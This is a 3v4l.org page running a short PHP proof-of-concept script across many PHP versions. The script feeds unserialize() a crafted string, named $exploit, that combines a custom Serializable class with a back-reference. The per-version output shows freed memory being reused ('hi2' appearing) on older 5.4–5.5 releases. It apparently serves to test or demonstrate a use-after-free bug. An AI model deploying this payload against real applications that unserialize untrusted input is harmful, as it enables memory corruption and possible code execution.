3v4l.org

run code in 300+ PHP versions simultaneously
<?php class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); } } $inner = 'a:2:{i:0;i:1;i:1;i:2'; $exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data);
Output for 8.3.0 - 8.3.6
Deprecated: obj implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in /in/gDfuY on line 3 Warning: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 Warning: unserialize(): Error at offset 52 of 53 bytes in /in/gDfuY on line 16 bool(false)
Output for 8.1.0 - 8.1.28, 8.2.0 - 8.2.18
Deprecated: obj implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in /in/gDfuY on line 3 Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 Notice: unserialize(): Error at offset 52 of 53 bytes in /in/gDfuY on line 16 bool(false)
Output for 7.0.20, 7.1.0 - 7.1.20, 7.2.0 - 7.2.33, 7.3.16 - 7.3.31, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 Notice: unserialize(): Error at offset 52 of 53 bytes in /in/gDfuY on line 16 bool(false)
Output for 7.3.32 - 7.3.33
bool(false)
Output for 7.0.0 - 7.0.6
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(1) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } }
Output for 5.4.45, 5.5.29 - 5.5.35, 5.6.13 - 5.6.28
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } [1]=> NULL }
Output for 5.6.7 - 5.6.12
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } [1]=> &UNKNOWN:0 }
Output for 5.4.2 - 5.4.44, 5.5.24 - 5.5.28
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } [1]=> string(3) "hi2" }
preferences:
201.74 ms | 402 KiB | 228 Q